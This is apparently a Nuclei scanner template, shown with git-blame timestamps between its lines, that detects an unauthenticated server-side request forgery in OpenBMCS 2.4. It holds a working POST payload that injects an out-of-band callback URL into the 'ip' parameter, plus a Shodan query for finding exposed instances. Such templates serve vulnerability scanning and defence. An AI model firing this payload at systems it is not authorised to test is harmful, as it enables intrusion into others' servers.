2022-01-26 11:26:40 +00:00
id : openbmcs-ssrf
info :
2022-09-16 19:50:10 +00:00
name : OpenBMCS 2.4 - Server-Side Request Forgery / Remote File Inclusion
2022-01-26 11:26:40 +00:00
author : dhiyaneshDK
2023-01-24 07:29:21 +00:00
severity : medium
2022-09-16 19:50:10 +00:00
description : OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/50670
2022-09-16 19:50:10 +00:00
- https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score : 6.8
cwe-id : CWE-918
2022-01-26 11:26:40 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-01-26 11:26:40 +00:00
shodan-query : http.favicon.hash:1550906681
2023-06-02 23:20:49 +00:00
tags : ssrf,oast,openbmcs,edb,misconfig
2022-01-26 11:26:40 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-26 11:26:40 +00:00
- raw :
- |
POST /php/query.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
ip={{interactsh-url}}:80&argu=/
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol # Confirms the DNS Interaction
words :
- "http"
- type : status
status :
- 302
2023-10-19 13:13:52 +00:00
# digest: 4a0a00473045022100d16aff0d228e68a1485794929aa88d53d923ce9378f15e7b2fbd697d71ad7d8f02206a1ababde1fe4eb58f8a87979a6610f04427085510b630bb842c0fa7f2b086e2:922c64590222798bb761d5b6d8e72950